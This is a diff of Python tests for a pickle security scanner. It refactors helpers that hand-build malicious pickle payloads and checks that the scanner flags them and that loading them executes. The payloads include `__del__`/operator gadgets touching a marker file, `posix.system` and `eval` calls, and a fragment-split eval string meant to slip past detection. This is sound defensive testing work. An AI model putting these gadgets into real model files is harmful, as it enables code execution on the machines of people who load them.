bytes: + return _type_finalizer_payload(marker, drop_instance=drop_instance, constructor_name=b"object.__class__") + + +def _builtins_type_setattr_dynamic_del_finalizer_payload(marker: Path, *, drop_instance: bool) -> bytes: parts = [b"\x80\x04"] - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"object.__class__"), b"\x93"] - parts += [b"(", _text_operand("DerivedPath")] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(type(marker).__name__.encode()), b"\x93"] - parts += [b"\x85", b"}", _dynamic_dunder_name_payload("del")] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [b"s", b"tR\x940"] - parts += [b"h\x00", _text_operand(str(marker)), b"\x85R"] - if drop_instance: - parts += [b"0N"] - parts += [b"."] - return b"".join(parts) - - -def _builtins_type_setattr_dynamic_del_finalizer_payload(marker: Path, *, drop_instance: bool) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"type"), b"\x93"] + parts += [_short_binunicode(b"builtins"), _short_binunicode(b"type"), b"\x93"] parts += [b"(", _text_operand("DerivedPath")] parts += [_short_binunicode(b"pathlib"), _short_binunicode(type(marker).__name__.encode()), b"\x93"] parts += [b"\x85", b"}", b"tR\x940"] @@ -2497,21 +2218,7 @@ def _builtins_type_setattr_dynamic_del_finalizer_payload(marker: Path, *, drop_i def _builtins_type_eq_comparison_payload(marker: Path, *, include_call: bool) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"type"), b"\x93"] - parts += [b"(", _text_operand("DerivedPath")] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(type(marker).__name__.encode()), b"\x93"] - parts += [b"\x85", b"}", _text_operand("__eq__")] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [b"s", b"tR\x940"] - parts += [b"h\x00", _text_operand(str(marker)), b"\x85R\x940"] - if include_call: - parts += [_short_binunicode(b"operator"), _short_binunicode(b"eq"), b"\x93"] - parts += [b"h\x01", b"M" + (0o666).to_bytes(2, "little"), b"\x86R"] - else: - parts += [b"h\x01"] - parts += [b"."] - return b"".join(parts) + return _type_comparison_payload(marker, include_call=include_call, method_name="__eq__", operator_name=b"eq") def _builtins_type_ordering_comparison_payload( @@ -2538,28 +2245,7 @@ def _builtins_type_ordering_comparison_payload( return b"".join(parts) -def _builtins_type_item_protocol_payload( - marker: Path, - *, - method_name: str, - operator_name: str, - include_call: bool, -) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"type"), b"\x93"] - parts += [b"(", _text_operand("DerivedPath")] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(type(marker).__name__.encode()), b"\x93"] - parts += [b"\x85", b"}", _text_operand(method_name)] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [b"s", b"tR\x940"] - parts += [b"h\x00", _text_operand(str(marker)), b"\x85R\x940"] - if include_call: - parts += [_short_binunicode(b"operator"), _short_binunicode(operator_name.encode()), b"\x93"] - parts += [b"h\x01", b"M" + (0o666).to_bytes(2, "little"), b"\x86R"] - else: - parts += [b"h\x01"] - parts += [b"."] - return b"".join(parts) +_builtins_type_item_protocol_payload = _builtins_type_ordering_comparison_payload def _builtins_type_binary_operator_payload( @@ -2810,21 +2496,9 @@ def _builtins_type_descriptor_set_name_payload(marker: Path, *, include_owner_cl def _builtins_type_contains_membership_payload(marker: Path, *, include_call: bool) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"type"), b"\x93"] - parts += [b"(", _text_operand("DerivedPath")] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(type(marker).__name__.encode()), b"\x93"] - parts += [b"\x85", b"}", _text_operand("__contains__")] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [b"s", b"tR\x940"] - parts += [b"h\x00", _text_operand(str(marker)), b"\x85R\x940"] - if include_call: - parts += [_short_binunicode(b"operator"), _short_binunicode(b"contains"), b"\x93"] - parts += [b"h\x01", b"M" + (0o666).to_bytes(2, "little"), b"\x86R"] - else: - parts += [b"h\x01"] - parts += [b"."] - return b"".join(parts) + return _type_comparison_payload( + marker, include_call=include_call, method_name="__contains__", operator_name=b"contains" + ) def _builtins_type_setitem_assignment_payload(marker: Path, *, include_call: bool) -> bytes: @@ -2866,24 +2540,9 @@ def _builtins_staticmethod_descriptor_payload(marker: Path, *, include_call: boo def _builtins_property_get_descriptor_payload(marker: Path, *, include_call: bool) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"property"), b"\x93"] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [b"\x85R\x94"] - if include_call: - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"property.__get__"), b"\x93"] - parts += [b"h\x00"] - parts += [ - _short_binunicode(b"pathlib"), - _short_binunicode(type(marker).__name__.encode()), - b"\x93(", - ] - parts.extend(_text_operand(part) for part in marker.parts) - parts += [b"tR", b"\x86R"] - else: - parts += [b"h\x00"] - parts += [b"."] - return b"".join(parts) + return _property_descriptor_payload( + marker, include_call=include_call, module_name=b"builtins", class_name=b"property" + ) def _builtins_classmethod_get_descriptor_payload(marker: Path, *, include_call: bool) -> bytes: @@ -2982,45 +2641,23 @@ def _unittest_mock_side_effect_payload(marker: Path, class_name: bytes = b"Mock" def _threadpool_executor_submit_payload(marker: Path) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"concurrent.futures"), _short_binunicode(b"ThreadPoolExecutor"), b"\x93)R\x94"] - parts += [_short_binunicode(b"concurrent.futures"), _short_binunicode(b"ThreadPoolExecutor.submit"), b"\x93("] - parts += [b"h\x00"] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [ - _short_binunicode(b"pathlib"), - _short_binunicode(type(marker).__name__.encode()), - b"\x93(", - ] - parts.extend(_short_binunicode(part.encode()) for part in marker.parts) - parts += [b"tR", b"tR0"] - parts += [ - _short_binunicode(b"concurrent.futures"), - _short_binunicode(b"ThreadPoolExecutor.shutdown"), - b"\x93h\x00\x85R.", - ] - return b"".join(parts) + return _callback_owner_payload( + marker, + module_name=b"concurrent.futures", + class_name=b"ThreadPoolExecutor", + callback_name=b"ThreadPoolExecutor.submit", + close_name=b"ThreadPoolExecutor.shutdown", + ) def _processpool_executor_submit_payload(marker: Path) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"concurrent.futures"), _short_binunicode(b"ProcessPoolExecutor"), b"\x93)R\x94"] - parts += [_short_binunicode(b"concurrent.futures"), _short_binunicode(b"ProcessPoolExecutor.submit"), b"\x93("] - parts += [b"h\x00"] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [ - _short_binunicode(b"pathlib"), - _short_binunicode(type(marker).__name__.encode()), - b"\x93(", - ] - parts.extend(_short_binunicode(part.encode()) for part in marker.parts) - parts += [b"tR", b"tR0"] - parts += [ - _short_binunicode(b"concurrent.futures"), - _short_binunicode(b"ProcessPoolExecutor.shutdown"), - b"\x93h\x00\x85R.", - ] - return b"".join(parts) + return _callback_owner_payload( + marker, + module_name=b"concurrent.futures", + class_name=b"ProcessPoolExecutor", + callback_name=b"ProcessPoolExecutor.submit", + close_name=b"ProcessPoolExecutor.shutdown", + ) def _site_addsitedir_pth_payload(pth_path: Path, marker: Path, *, include_addsitedir: bool) -> bytes: @@ -3183,49 +2820,15 @@ def _typing_get_type_hints_payload(marker: Path) -> bytes: def _operator_call_payload(marker: Path) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"operator"), _short_binunicode(b"call"), b"\x93"] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [ - _short_binunicode(b"pathlib"), - _short_binunicode(type(marker).__name__.encode()), - b"\x93(", - ] - parts.extend(_short_binunicode(part.encode()) for part in marker.parts) - parts += [b"tR", b"\x86R."] - return b"".join(parts) + return _touch_callback_payload(marker, module_name=b"operator", callback_name=b"call") def _builtins_map_tuple_payload(marker: Path) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"tuple"), b"\x93"] - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"map"), b"\x93"] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [b"]"] - parts += [ - _short_binunicode(b"pathlib"), - _short_binunicode(type(marker).__name__.encode()), - b"\x93(", - ] - parts.extend(_short_binunicode(part.encode()) for part in marker.parts) - parts += [b"tRa", b"\x86R", b"\x85R."] - return b"".join(parts) + return _iterator_tuple_payload(marker, module_name=b"builtins", iterator_name=b"map") def _builtins_filter_tuple_payload(marker: Path) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"tuple"), b"\x93"] - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"filter"), b"\x93"] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [b"]"] - parts += [ - _short_binunicode(b"pathlib"), - _short_binunicode(type(marker).__name__.encode()), - b"\x93(", - ] - parts.extend(_short_binunicode(part.encode()) for part in marker.parts) - parts += [b"tRa", b"\x86R", b"\x85R."] - return b"".join(parts) + return _iterator_tuple_payload(marker, module_name=b"builtins", iterator_name=b"filter") def _itertools_accumulate_tuple_payload(marker: Path) -> bytes: @@ -3246,35 +2849,11 @@ def _itertools_accumulate_tuple_payload(marker: Path) -> bytes: def _itertools_dropwhile_tuple_payload(marker: Path) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"tuple"), b"\x93"] - parts += [_short_binunicode(b"itertools"), _short_binunicode(b"dropwhile"), b"\x93"] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [b"]"] - parts += [ - _short_binunicode(b"pathlib"), - _short_binunicode(type(marker).__name__.encode()), - b"\x93(", - ] - parts.extend(_short_binunicode(part.encode()) for part in marker.parts) - parts += [b"tRa", b"\x86R", b"\x85R."] - return b"".join(parts) + return _iterator_tuple_payload(marker, module_name=b"itertools", iterator_name=b"dropwhile") def _itertools_filterfalse_tuple_payload(marker: Path) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"tuple"), b"\x93"] - parts += [_short_binunicode(b"itertools"), _short_binunicode(b"filterfalse"), b"\x93"] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [b"]"] - parts += [ - _short_binunicode(b"pathlib"), - _short_binunicode(type(marker).__name__.encode()), - b"\x93(", - ] - parts.extend(_short_binunicode(part.encode()) for part in marker.parts) - parts += [b"tRa", b"\x86R", b"\x85R."] - return b"".join(parts) + return _iterator_tuple_payload(marker, module_name=b"itertools", iterator_name=b"filterfalse") def _itertools_groupby_tuple_payload(marker: Path) -> bytes: @@ -3311,19 +2890,7 @@ def _itertools_starmap_tuple_payload(marker: Path) -> bytes: def _itertools_takewhile_tuple_payload(marker: Path) -> bytes: - parts = [b"\x80\x04"] - parts += [_short_binunicode(b"builtins"), _short_binunicode(b"tuple"), b"\x93"] - parts += [_short_binunicode(b"itertools"), _short_binunicode(b"takewhile"), b"\x93"] - parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] - parts += [b"]"] - parts += [ - _short_binunicode(b"pathlib"), - _short_binunicode(type(marker).__name__.encode()), - b"\x93(", - ] - parts.extend(_short_binunicode(part.encode()) for part in marker.parts) - parts += [b"tRa", b"\x86R", b"\x85R."] - return b"".join(parts) + return _iterator_tuple_payload(marker, module_name=b"itertools", iterator_name=b"takewhile") def test_adversarial_oracle_corpus_is_large_enough() -> None: @@ -5546,14 +5113,7 @@ def test_scan_bytes_preserves_mailbox_add_detection_when_constructor_analysis_un tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - original_entrypoints = call_graph._safe_call_graph_entrypoints - - def flaky_entrypoints(function_name: str) -> tuple[str, ...]: - if function_name == "mailbox.mbox": - raise call_graph._CallGraphAnalysisLimitError("synthetic mailbox constructor source gap") - return original_entrypoints(function_name) - - monkeypatch.setattr(call_graph, "_safe_call_graph_entrypoints", flaky_entrypoints) + _install_mailbox_entrypoint_gap(monkeypatch, "mailbox.mbox", "synthetic mailbox constructor source gap") pth_path = tmp_path / "mailbox_cleanup_exec.pth" marker = tmp_path / "mailbox_cleanup_pth_rce_marker" control_payload = _mailbox_singlefile_pth_payload( @@ -5586,14 +5146,7 @@ def test_scan_bytes_keeps_mailbox_multi_arg_constructor_gap_inconclusive( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - original_entrypoints = call_graph._safe_call_graph_entrypoints - - def flaky_entrypoints(function_name: str) -> tuple[str, ...]: - if function_name == "mailbox.mbox": - raise call_graph._CallGraphAnalysisLimitError("synthetic mailbox constructor source gap") - return original_entrypoints(function_name) - - monkeypatch.setattr(call_graph, "_safe_call_graph_entrypoints", flaky_entrypoints) + _install_mailbox_entrypoint_gap(monkeypatch, "mailbox.mbox", "synthetic mailbox constructor source gap") pth_path = tmp_path / "mailbox_multi_arg_gap_exec.pth" marker = tmp_path / "mailbox_multi_arg_gap_pth_rce_marker" payload = b"".join( @@ -5618,14 +5171,7 @@ def test_scan_bytes_keeps_mailbox_flush_analysis_gap_fail_closed( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - original_entrypoints = call_graph._safe_call_graph_entrypoints - - def flaky_entrypoints(function_name: str) -> tuple[str, ...]: - if function_name == "mailbox.mbox.flush": - raise call_graph._CallGraphAnalysisLimitError("synthetic mailbox flush source gap") - return original_entrypoints(function_name) - - monkeypatch.setattr(call_graph, "_safe_call_graph_entrypoints", flaky_entrypoints) + _install_mailbox_entrypoint_gap(monkeypatch, "mailbox.mbox.flush", "synthetic mailbox flush source gap") pth_path = tmp_path / "mailbox_flush_gap_exec.pth" marker = tmp_path / "mailbox_flush_gap_pth_rce_marker" control_payload = _mailbox_singlefile_pth_payload( @@ -6677,38 +6223,7 @@ def test_scan_bytes_blocks_builtins_type_binary_operator_rce( method_name: str, operator_name: str, ) -> None: - marker = tmp_path / f"builtins_type_{operator_name}_binary_operator_rce_marker" - control_payload = _builtins_type_binary_operator_payload( - marker, - method_name=method_name, - operator_name=operator_name, - include_call=False, - ) - payload = _builtins_type_binary_operator_payload( - marker, - method_name=method_name, - operator_name=operator_name, - include_call=True, - ) - - control_report = scan_bytes(control_payload, source=f"builtins-type-{operator_name}-binary-control.pkl") - assert control_report.verdict == SafetyVerdict.SUSPICIOUS - assert _has_suspicious_magic_method_finding(control_report) - - assert not marker.exists() - control_result = pickle.loads(control_payload) - assert type(control_result).__name__ == "DerivedPath" - assert not marker.exists() - - report = scan_bytes(payload, source=f"builtins-type-{operator_name}-binary-rce.pkl") - - assert report.verdict == SafetyVerdict.SUSPICIOUS - assert _has_suspicious_magic_method_finding(report) - - assert not marker.exists() - result = pickle.loads(payload) - assert result is None - assert marker.exists() + _assert_binary_operator_rce(tmp_path, method_name, operator_name, "binary") @pytest.mark.parametrize( @@ -6791,38 +6306,7 @@ def test_scan_bytes_blocks_builtins_type_inplace_binary_operator_rce( method_name: str, operator_name: str, ) -> None: - marker = tmp_path / f"builtins_type_{operator_name}_inplace_operator_rce_marker" - control_payload = _builtins_type_binary_operator_payload( - marker, - method_name=method_name, - operator_name=operator_name, - include_call=False, - ) - payload = _builtins_type_binary_operator_payload( - marker, - method_name=method_name, - operator_name=operator_name, - include_call=True, - ) - - control_report = scan_bytes(control_payload, source=f"builtins-type-{operator_name}-inplace-control.pkl") - assert control_report.verdict == SafetyVerdict.SUSPICIOUS - assert _has_suspicious_magic_method_finding(control_report) - - assert not marker.exists() - control_result = pickle.loads(control_payload) - assert type(control_result).__name__ == "DerivedPath" - assert not marker.exists() - - report = scan_bytes(payload, source=f"builtins-type-{operator_name}-inplace-rce.pkl") - - assert report.verdict == SafetyVerdict.SUSPICIOUS - assert _has_suspicious_magic_method_finding(report) - - assert not marker.exists() - result = pickle.loads(payload) - assert result is None - assert marker.exists() + _assert_binary_operator_rce(tmp_path, method_name, operator_name, "inplace") @pytest.mark.parametrize( @@ -7603,3 +7087,225 @@ def __reduce__(self) -> tuple[object, tuple[object, ...]]: assert not marker.exists() pickle.loads(payload) assert marker.exists() + + +def _join_fragment_operands(fragments: list[str]) -> list[bytes]: + return [ + _global_operand("builtins", "str.join"), + _text_operand(""), + _tuple_payload_operands([_text_operand(fragment) for fragment in fragments]), + b"\x86R", + ] + + +def _join_fragment_payload(fragments: list[str]) -> bytes: + return b"".join( + [ + _global_operand("builtins", "str.join"), + _tuple_payload_operands( + [ + _text_operand(""), + _list_payload_operands([_text_operand(fragment) for fragment in fragments]), + ] + ), + b"R", + ] + ) + + +def _callback_owner_payload( + marker: Path, *, module_name: bytes, class_name: bytes, callback_name: bytes, close_name: bytes +) -> bytes: + parts = [b"\x80\x04"] + parts += [_short_binunicode(module_name), _short_binunicode(class_name), b"\x93)R\x94"] + parts += [_short_binunicode(module_name), _short_binunicode(callback_name), b"\x93("] + parts += [b"h\x00"] + parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] + parts += [ + _short_binunicode(b"pathlib"), + _short_binunicode(type(marker).__name__.encode()), + b"\x93(", + ] + parts.extend(_short_binunicode(part.encode()) for part in marker.parts) + parts += [b"tR", b"tR0"] + parts += [_short_binunicode(module_name), _short_binunicode(close_name), b"\x93h\x00\x85R."] + return b"".join(parts) + + +def _frame_builtins_lookup_eval_payload( + code: str, *, include_lookup: bool, frame_name: str, descriptor_name: str +) -> tuple[bytes, str]: + code_fragments = [code[offset : offset + 3] for offset in range(0, len(code), 3)] + + parts = [b"\x80\x04"] + if include_lookup: + parts += [_legacy_global_operand("inspect", frame_name), b")R\x940"] + parts += [_legacy_global_operand("types", descriptor_name)] + parts += [b"h\x00\x85R\x940"] + parts += [_global_operand("builtins", "dict.get")] + parts += [b"h\x01"] + parts += _join_fragment_operands(["ev", "al"]) + parts += [b"\x86R\x940"] + parts += _join_fragment_operands(code_fragments) + if include_lookup: + parts += [b"\x940h\x02h\x03\x85R"] + parts += [b"."] + return b"".join(parts), code + + +def _iterator_tuple_payload(marker: Path, *, module_name: bytes, iterator_name: bytes) -> bytes: + parts = [b"\x80\x04"] + parts += [_short_binunicode(b"builtins"), _short_binunicode(b"tuple"), b"\x93"] + parts += [_short_binunicode(module_name), _short_binunicode(iterator_name), b"\x93"] + parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] + parts += [b"]"] + parts += [ + _short_binunicode(b"pathlib"), + _short_binunicode(type(marker).__name__.encode()), + b"\x93(", + ] + parts.extend(_short_binunicode(part.encode()) for part in marker.parts) + parts += [b"tRa", b"\x86R", b"\x85R."] + return b"".join(parts) + + +def _property_descriptor_payload(marker: Path, *, include_call: bool, module_name: bytes, class_name: bytes) -> bytes: + parts = [b"\x80\x04"] + parts += [_short_binunicode(module_name), _short_binunicode(class_name), b"\x93"] + parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] + parts += [b"\x85R\x94"] + if include_call: + parts += [_short_binunicode(module_name), _short_binunicode(class_name + b".__get__"), b"\x93"] + parts += [b"h\x00"] + parts += [ + _short_binunicode(b"pathlib"), + _short_binunicode(type(marker).__name__.encode()), + b"\x93(", + ] + parts.extend(_text_operand(part) for part in marker.parts) + parts += [b"tR", b"\x86R"] + else: + parts += [b"h\x00"] + parts += [b"."] + return b"".join(parts) + + +def _scipy_setstate_payload(parse_arg_template: str, *, module_name: str, class_name: str) -> bytes: + state = b"".join( + [ + b"}", + _dict_setitem("_parse_arg_template", _text_operand(parse_arg_template)), + _dict_setitem("numargs", _int_operand(0)), + _dict_setitem("moment_type", _int_operand(0)), + ] + ) + return b"".join( + [ + b"\x80\x04", + _global_operand(module_name, class_name), + b")\x81", + state, + b"b.", + ] + ) + + +def _touch_callback_payload(marker: Path, *, module_name: bytes, callback_name: bytes) -> bytes: + parts = [b"\x80\x04"] + parts += [_short_binunicode(module_name), _short_binunicode(callback_name), b"\x93"] + parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] + parts += [ + _short_binunicode(b"pathlib"), + _short_binunicode(type(marker).__name__.encode()), + b"\x93(", + ] + parts.extend(_short_binunicode(part.encode()) for part in marker.parts) + parts += [b"tR", b"\x86R."] + return b"".join(parts) + + +def _type_comparison_payload(marker: Path, *, include_call: bool, method_name: str, operator_name: bytes) -> bytes: + parts = [b"\x80\x04"] + parts += [_short_binunicode(b"builtins"), _short_binunicode(b"type"), b"\x93"] + parts += [b"(", _text_operand("DerivedPath")] + parts += [_short_binunicode(b"pathlib"), _short_binunicode(type(marker).__name__.encode()), b"\x93"] + parts += [b"\x85", b"}", _text_operand(method_name)] + parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] + parts += [b"s", b"tR\x940"] + parts += [b"h\x00", _text_operand(str(marker)), b"\x85R\x940"] + if include_call: + parts += [_short_binunicode(b"operator"), _short_binunicode(operator_name), b"\x93"] + parts += [b"h\x01", b"M" + (0o666).to_bytes(2, "little"), b"\x86R"] + else: + parts += [b"h\x01"] + parts += [b"."] + return b"".join(parts) + + +def _type_constructor_finalizer_payload( + marker: Path, *, drop_instance: bool, type_value_name: bytes = b"type", constructor_name: bytes +) -> bytes: + parts = [b"\x80\x04"] + parts += [_short_binunicode(b"builtins"), _short_binunicode(constructor_name), b"\x93"] + parts += [b"("] + parts += [_short_binunicode(b"builtins"), _short_binunicode(type_value_name), b"\x93"] + parts += [_text_operand("DerivedPath")] + parts += [_short_binunicode(b"pathlib"), _short_binunicode(type(marker).__name__.encode()), b"\x93"] + parts += [b"\x85", b"}", _dynamic_dunder_name_payload("del")] + parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] + parts += [b"s", b"tR\x940"] + parts += [b"h\x00", _text_operand(str(marker)), b"\x85R"] + if drop_instance: + parts += [b"0N"] + parts += [b"."] + return b"".join(parts) + + +def _type_finalizer_payload(marker: Path, *, drop_instance: bool, constructor_name: bytes) -> bytes: + parts = [b"\x80\x04"] + parts += [_short_binunicode(b"builtins"), _short_binunicode(constructor_name), b"\x93"] + parts += [b"(", _text_operand("DerivedPath")] + parts += [_short_binunicode(b"pathlib"), _short_binunicode(type(marker).__name__.encode()), b"\x93"] + parts += [b"\x85", b"}", _dynamic_dunder_name_payload("del")] + parts += [_short_binunicode(b"pathlib"), _short_binunicode(b"Path.touch"), b"\x93"] + parts += [b"s", b"tR\x940"] + parts += [b"h\x00", _text_operand(str(marker)), b"\x85R"] + if drop_instance: + parts += [b"0N"] + parts += [b"."] + return b"".join(parts) + + +def _assert_binary_operator_rce(tmp_path: Path, method_name: str, operator_name: str, operator_kind: str) -> None: + marker = tmp_path / f"builtins_type_{operator_name}_{operator_kind}_operator_rce_marker" + control_payload = _builtins_type_binary_operator_payload( + marker, + method_name=method_name, + operator_name=operator_name, + include_call=False, + ) + payload = _builtins_type_binary_operator_payload( + marker, + method_name=method_name, + operator_name=operator_name, + include_call=True, + ) + + control_report = scan_bytes(control_payload, source=f"builtins-type-{operator_name}-{operator_kind}-control.pkl") + assert control_report.verdict == SafetyVerdict.SUSPICIOUS + assert _has_suspicious_magic_method_finding(control_report) + + assert not marker.exists() + control_result = pickle.loads(control_payload) + assert type(control_result).__name__ == "DerivedPath" + assert not marker.exists() + + report = scan_bytes(payload, source=f"builtins-type-{operator_name}-{operator_kind}-rce.pkl") + + assert report.verdict == SafetyVerdict.SUSPICIOUS + assert _has_suspicious_magic_method_finding(report) + + assert not marker.exists() + result = pickle.loads(payload) + assert result is None + assert marker.exists() diff --git a/packages/modelaudit-picklescan/tests/test_api.py b/packages/modelaudit-picklescan/tests/test_api.py index 74eb3cdf0..7d7e575b6 100644 --- a/packages/modelaudit-picklescan/tests/test_api.py +++ b/packages/modelaudit-picklescan/tests/test_api.py @@ -42,8 +42,51 @@ from pathlib import Path, PurePosixPath from types import CodeType, ModuleType from typing import Any, Literal, cast +from unittest.mock import create_autospec import pytest +from framework_fixtures import ( + SystemCommandPayload, + _assert_shadow_framework_unpickle_executes, + _binary_magic_tensor_storage_bytes, + _clear_ultralytics_modules, + _float_storage_element_count_for_bytes, + _force_framework_metadata_unresolved, + _frame_first_large_malicious_eval_pickle_payload, + _frame_first_raw_storage_bytes, + _large_proto0_system_payload, + _make_dup_heavy_pickle, + _make_memo_expansion_pickle, + _make_pre_memoized_post_budget_stack_global_payload, + _pickle_binint, + _pickle_int_tuple, + _pickleish_tensor_storage_bytes, + _pytorch_storage_protocol0_persistent_id_payload, + _pytorch_storage_then_arbitrary_protocol0_persistent_id_payload, + _replace_source_after_fstat, + _replace_source_on_read, + _require_torch_distribution, + _shadow_framework_divergence_cases, + _shadow_newobj_build_payload, + _shadow_slot_state_build_payload, + _static_getattr_protocol0_unicode_payload, + _write_cross_module_rebind_target_package, + _write_enum_trusted_transformers_package, + _write_import_side_effect_transformers_package, + _write_init_heavy_trusted_transformers_package, + _write_init_inert_setstate_transformers_package, + _write_rebindable_trusted_torch_utils_package, + _write_rebindable_trusted_transformers_package, + _write_runtime_mutable_trusted_transformers_package, + _write_sitecustomize_trusting_site_packages, + _yolov5n6_tensor_storage_prefix_bytes, +) +from pickle_test_helpers import ( + _binunicode, + _binunicode8, + _proto0_string_literal, + _short_binunicode, +) import modelaudit_picklescan.api as package_api import modelaudit_picklescan.call_graph as call_graph @@ -167,12 +210,6 @@ def __setitem__(self, key: str, value: str) -> None: _PROTOCOL_MUTATION_EVENTS.append((key, value)) -def _short_binunicode(data: bytes) -> bytes: - if len(data) > 0xFF: - raise ValueError("SHORT_BINUNICODE helper accepts at most 255 bytes") - return b"\x8c" + bytes([len(data)]) + data - - def _global(module: bytes, name: bytes) -> bytes: return b"c" + module + b"\n" + name + b"\n" @@ -229,22 +266,6 @@ def _pytorch_storage_persistent_id_payload( ) -def _pickle_binint(value: int) -> bytes: - if 0 <= value <= 0xFF: - return b"K" + bytes([value]) - return b"J" + value.to_bytes(4, "little", signed=True) - - -def _proto0_string_literal(value: bytes) -> bytes: - literal = value.decode("latin-1").encode("unicode_escape").replace(b"'", b"\\'") - return b"S'" + literal + b"'\n." - - -def _float_storage_element_count_for_bytes(data: bytes) -> int: - assert len(data) % 4 == 0 - return len(data) // 4 - - def _float_storage_persistent_id_payload_for_bytes(key: str, data: bytes) -> bytes: return _pytorch_storage_persistent_id_payload( key, @@ -252,19 +273,6 @@ def _float_storage_persistent_id_payload_for_bytes(key: str, data: bytes) -> byt ) -def _pickle_int_tuple(values: tuple[int, ...]) -> bytes: - payload = b"".join(_pickle_binint(value) for value in values) - if len(values) == 0: - return b")" - if len(values) == 1: - return payload + b"\x85" - if len(values) == 2: - return payload + b"\x86" - if len(values) == 3: - return payload + b"\x87" - return b"(" + payload + b"t" - - def _pytorch_storage_binpersid_expr( key: str = "0", *, @@ -404,13 +412,6 @@ def _write_pytorch_zip_data_pickle( archive.writestr("archive/data/0", storage_bytes) -def _require_torch_distribution() -> None: - try: - importlib_metadata.distribution("torch") - except importlib_metadata.PackageNotFoundError: - pytest.skip("torch distribution not installed") - - def _torch_rebuild_tensor_v2_warnings(report: PickleReport) -> list[Finding]: return [ finding @@ -455,21 +456,6 @@ def _scan_file_report_dict_subprocess( return cast(dict[str, Any], json.loads(completed.stdout)) -def _pytorch_storage_protocol0_persistent_id_payload( - key: str, - *, - storage_qualname: str = "torch.FloatStorage", - size: int | str = 1, -) -> bytes: - return f"(dp0\nVx\np1\nP('storage', , '{key}', 'cpu', {size})\ns.".encode("ascii") - - -def _pytorch_storage_then_arbitrary_protocol0_persistent_id_payload(key: str) -> bytes: - payload = _pytorch_storage_protocol0_persistent_id_payload(key) - assert payload.endswith(b".") - return payload[:-1] + b"Parbitrary-storage-key\n0." - - def _pytorch_storage_persistent_id_payload_with_extra_field(key: str) -> bytes: payload = _pytorch_storage_persistent_id_payload(key) assert payload.endswith(b"tQ.") @@ -487,30 +473,10 @@ def _fake_byte_storage_persistent_id_payload(key: str) -> bytes: ) -def _large_proto0_system_payload() -> bytes: - return b"cposix\nsystem\n(S'" + (b"A" * 10_000) + b"'\ntR." - - def _protocol_less_framed_malicious_storage_payload() -> bytes: return b"cposix\nsystem\n(S'echo hidden'\ntR" + b"\x95" + (100).to_bytes(8, "little") + b"abc" -def _frame_first_large_malicious_eval_pickle_payload() -> bytes: - benign_prefix = b"N0" * 2100 - dangerous_suffix = b"cbuiltins\neval\n(S'print(1)'\ntR." - body = benign_prefix + dangerous_suffix - payload = b"\x95" + len(body).to_bytes(8, "little") + body - assert payload[0] == 0x95 - assert int.from_bytes(payload[1:9], "little") > 4 * 1024 - assert payload.find(b"cbuiltins\neval\n") > 4 * 1024 - assert payload.rfind(b".") > 4 * 1024 - return payload - - -def _frame_first_raw_storage_bytes() -> bytes: - return b"\x95" + (10_000).to_bytes(8, "little") + (b"\x00" * 4095) - - def _large_length_prefixed_malicious_payload() -> bytes: declared_payload = b"A" * 10_000 return ( @@ -521,34 +487,12 @@ def _large_length_prefixed_malicious_payload() -> bytes: ) -def _pickleish_tensor_storage_bytes() -> bytes: - # Minimal prefix from pinned PiD raw tensor storage that looks like a pickle FRAME crossing STOP. - 